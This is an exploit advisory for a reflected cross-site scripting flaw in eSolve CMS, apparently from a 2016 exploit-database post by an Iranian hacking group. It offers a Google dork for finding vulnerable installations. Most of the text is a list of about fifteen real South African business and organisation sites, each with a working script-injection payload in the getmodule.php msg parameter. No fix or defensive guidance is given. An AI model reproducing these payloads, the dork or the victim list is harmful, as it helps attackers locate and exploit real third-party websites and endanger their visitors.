######################
# Exploit Title : eSolve CMS Cross Site Scripting
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://www.esolve.co.za/
# Google Dork : "Powered by eSolve" inurl:"getmodule.php?id="
# Date: 04 Feb. 2016
# Tested On :Windows 7 /FireFox
######################
#demos and explanations:
#http://www.wpna.co.za/getmodule.php?id=showmessage.php&msg="><Script>alert(/Ashiyane.org/)</script>
#http://www.neovision.co.za/getmodule.php?id=showmessage.php&msg="><Script>alert(/Ashiyane.org/)</script>
#http://www.canecutterguesthouse.co.za/getmodule.php?id=showmessage.php&msg="><Script>alert(/Ashiyane.org/)</script>
#http://www.umtapocentre.org.za/getmodule.php?id=showmessage.php&msg="><Script>alert(/Ashiyane.org/)</script>
#http://www.safepro.co.za/getmodule.php?id=showmessage.php&msg="><Script>alert(/Ashiyane.org/)</script>
#http://www.safariandoutdoor.co.za/getmodule.php?id=showmessage.php&msg="><Script>alert(/Ashiyane.org/)</script>
#http://www.skoonskin.co.za/getmodule.php?id=showmessage.php&msg="><Script>alert(/Ashiyane.org/)</script>
#http://www.wurmbosch.co.za/getmodule.php?id=showmessage.php&msg="><Script>alert(/Ashiyane.org/)</script>
#http://gatewayhealth.esolve.co.za/getmodule.php?id=showmessage.php&msg="><Script>alert(/Ashiyane.org/)</script>
#http://www.gymstore.co.za/getmodule.php?id=showmessage.php&msg="><Script>alert(/Ashiyane.org/)</script>
#http://www.oniccah.co.za/getmodule.php?id=showmessage.php&msg="><Script>alert(/Ashiyane.org/)</script>
#http://www.beadshop.co.za/getmodule.php?id=showmessage.php&msg="><Script>alert(/Ashiyane.org/)</script>
#http://www.seronictours.co.za/getmodule.php?id=showmessage.php&msg="><Script>alert(/Ashiyane.org/)</script>
#http://www.beadshop.co.za/getmodule.php?id=showmessage.php&msg="><Script>alert(/Ashiyane.org/)</script>
#http://www.babyhouse.co.za/getmodule.php?id=showmessage.php&msg="><Script>alert(/Ashiyane.org/)</script>
######################
# discovered by : Amir.ght
######################